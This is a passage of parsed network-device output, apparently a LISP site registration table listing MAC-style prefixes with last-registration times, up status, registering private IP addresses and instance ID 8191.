"00b1.e3ff.c73b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"00b1.e3ff.c8be/48": {
"last_register": "08:01:32",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"00b1.e3ff.c822/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"00b1.e3ff.c82e/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"00b1.e3ff.c9e1/48": {
"last_register": "06:27:10",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"00b1.e3ff.c9e4/48": {
"last_register": "01:06:57",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"00b1.e3ff.c9e7/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"00b1.e3ff.c918/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"00b1.e3ff.c91b/48": {
"last_register": "00:24:24",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"00b1.e3ff.c933/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"00b1.e3ff.cbca/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"00b1.e3ff.cb9a/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"00b1.e3ff.ccc6/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"00b1.e3ff.cc9f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"00b1.e3ff.cca8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"00b1.e3ff.cddd/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"00b1.e3ff.cde6/48": {
"last_register": "11:57:10",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"00b1.e3ff.cd17/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"00b1.e3ff.ce10/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"00b1.e3ff.cfc0/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"00b1.e3ff.cfc9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"00b1.e3ff.cfe1/48": {
"last_register": "04:59:58",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"00b1.e3ff.d0bf/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"00b1.e3ff.d095/48": {
"last_register": "07:01:35",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"00b1.e3ff.d1d0/48": {
"last_register": "08:20:24",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"00b1.e3ff.d1d9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"00b1.e3ff.d25a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"00b1.e3ff.d3bc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"00b1.e3ff.d395/48": {
"last_register": "01:08:56",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"00b1.e3ff.d39b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"00b1.e3ff.d43d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"00b1.e3ff.d440/48": {
"last_register": "01:35:56",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"00b1.e3ff.d467/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"00b1.e3ff.d48b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"00b1.e3ff.d716/48": {
"last_register": "00:10:08",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"00b1.e3ff.d719/48": {
"last_register": "07:29:42",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"00b1.e3ff.d72e/48": {
"last_register": "16:20:11",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"00b1.e3ff.d863/48": {
"last_register": "00:27:59",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"00b1.e3ff.d8a8/48": {
"last_register": "02:31:29",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"00b1.e3ff.d9c2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"00b1.e3ff.d9c5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"00b1.e3ff.d9c8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"00b1.e3ff.d9ce/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"00b1.e3ff.d9d1/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"00b1.e3ff.d9f2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"00b1.e3ff.d9fe/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"00b1.e3ff.d911/48": {
"last_register": "00:10:31",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"00b1.e3ff.d929/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"00b1.e3ff.d92f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"00b1.e3ff.d938/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"00b1.e3ff.d93e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"00b1.e3ff.d956/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"00b1.e3ff.d98f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"00b1.e3ff.d995/48": {
"last_register": "00:47:35",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"00b1.e3ff.d998/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"00b1.e3ff.575a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"00b1.e3ff.72c9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"00bf.77ff.c396/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"00bf.77ff.2829/48": {
"last_register": "1w2d",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"00c1.64ff.a3af/48": {
"last_register": "1d04h",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"00c1.64ff.6a7a/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"00c1.64ff.ba27/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"00c1.b1ff.ac3e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"00c8.8bff.4ac7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8191,
},
"00ca.e5ff.bdc9/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"00ca.e5ff.c151/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"00ca.e5ff.c155/48": {
"last_register": "1d19h",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"00ca.e5ff.c195/48": {
"last_register": "2d00h",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"00ca.e5ff.c1ad/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"00ca.e5ff.c1b1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"00ca.e5ff.1c46/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"00cc.fcff.3be1/48": {
"last_register": "2d00h",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"00cc.fcff.5769/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"00cc.fcff.98a5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"00cc.fcff.98ab/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"00cc.fcff.98b7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"00cc.fcff.98ed/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"00cc.fcff.9827/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"00cc.fcff.9857/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"00cc.fcff.985d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"00cc.fcff.9866/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"00cc.fcff.986c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"00cc.fcff.987b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"00cc.fcff.987e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"00cc.fcff.9887/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"00cc.fcff.99b9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"00cc.fcff.99d1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"00cc.fcff.99e3/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"00cc.fcff.99ec/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"00cc.fcff.99f5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"00cc.fcff.99f8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"00cc.fcff.99fb/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"00cc.fcff.991d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"00cc.fcff.9920/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"00cc.fcff.993b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"00cc.fcff.9941/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"00cc.fcff.9953/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"00cc.fcff.9a07/48": {
"last_register": "1w6d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8191,
},
"00cc.fcff.9f77/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"00cc.fcff.a0f7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"00cc.fcff.a1ea/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"00cc.fcff.a106/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"00cc.fcff.a256/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"00cc.fcff.a286/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"00cc.fcff.a289/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"00cc.fcff.a3a6/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"00cc.fcff.a3c1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.94:39184",
"inst_id": 8191,
},
"00cc.fcff.a3ca/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"00cc.fcff.a3cd/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"00cc.fcff.a3df/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"00cc.fcff.a3f4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"00cc.fcff.a3fa/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"00cc.fcff.a40f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"00cc.fcff.a472/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"00cc.fcff.a487/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"00cc.fcff.a48a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"00cc.fcff.a598/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"00cc.fcff.a5aa/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"00cc.fcff.a5c2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"00cc.fcff.a5da/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"00cc.fcff.a5ef/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8191,
},
"00cc.fcff.a505/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"00cc.fcff.a50b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"00cc.fcff.a6eb/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"00cc.fcff.a628/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"00cc.fcff.a646/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"00cc.fcff.a658/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"00cc.fcff.a65b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"00cc.fcff.a682/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"00cc.fcff.a694/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"00cc.fcff.a7e4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"00cc.fcff.a703/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"00cc.fcff.a70c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"00cc.fcff.a72d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"00cc.fcff.a730/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"00cc.fcff.a73c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"00cc.fcff.a75d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"00cc.fcff.a778/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8191,
},
"00cc.fcff.a793/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"00cc.fcff.a8a4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"00cc.fcff.a826/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"00cc.fcff.a96d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"00cc.fcff.a98e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"00cc.fcff.acf4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"00cc.fcff.ad00/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"00cc.fcff.b44b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"00cc.fcff.dd58/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"00cc.fcff.dea8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"00cc.fcff.e853/48": {
"last_register": "01:13:00",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"00cc.fcff.f141/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"00cc.fcff.f3ba/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"00cc.fcff.f79b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"00cc.fcff.fd98/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"00cc.fcff.fec4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"00cc.fcff.fe10/48": {
"last_register": "2d00h",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"00cc.fcff.0060/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"00cc.fcff.036c/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"00cc.fcff.0f84/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.252:16799",
"inst_id": 8191,
},
"00cc.fcff.110a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"00cc.fcff.1113/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"00cc.fcff.12ae/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"00cc.fcff.12d5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"00cc.fcff.125d/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"00cc.fcff.17eb/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"00cc.fcff.187e/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"00cc.fcff.1953/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"00cc.fcff.1ad9/48": {
"last_register": "09:49:46",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"00cc.fcff.1adf/48": {
"last_register": "09:35:59",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"00cc.fcff.1a2b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"00cc.fcff.1a3a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"00cc.fcff.1a4c/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"00cc.fcff.1a4f/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"00cc.fcff.1a73/48": {
"last_register": "00:40:53",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"00cc.fcff.1a82/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"00cc.fcff.1a88/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"00cc.fcff.1a8b/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"00cc.fcff.1a94/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"00cc.fcff.1b48/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"00cc.fcff.1b99/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"00cc.fcff.1c9e/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"00cc.fcff.1caa/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"00cc.fcff.1cf2/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"00cc.fcff.1cf5/48": {
"last_register": "15:09:12",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"00cc.fcff.2424/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"00cc.fcff.2b3e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"00cc.fcff.4272/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"00eb.d5ff.0e1e/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"00eb.d5ff.1661/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"00fd.22ff.46eb/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"00fd.22ff.60af/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"00fe.c8ff.0734/48": {
"last_register": "1w2d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"00fe.c8ff.075e/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"00fe.c8ff.228c/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"00fe.c8ff.23bd/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8191,
},
"00fe.c8ff.23ed/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"00fe.c8ff.3ead/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"00fe.c8ff.77e0/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"00fe.c8ff.b0ec/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"00fe.c8ff.c94d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"00fe.c8ff.ca3d/48": {
"last_register": "1d19h",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"00fe.c8ff.dad8/48": {
"last_register": "1d19h",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"00fe.c8ff.dcc0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"042a.e2ff.2b33/48": {
"last_register": "1d04h",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"042a.e2ff.28cf/48": {
"last_register": "1d19h",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"042a.e2ff.2c40/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"042a.e2ff.c454/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"0462.73ff.1ce0/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
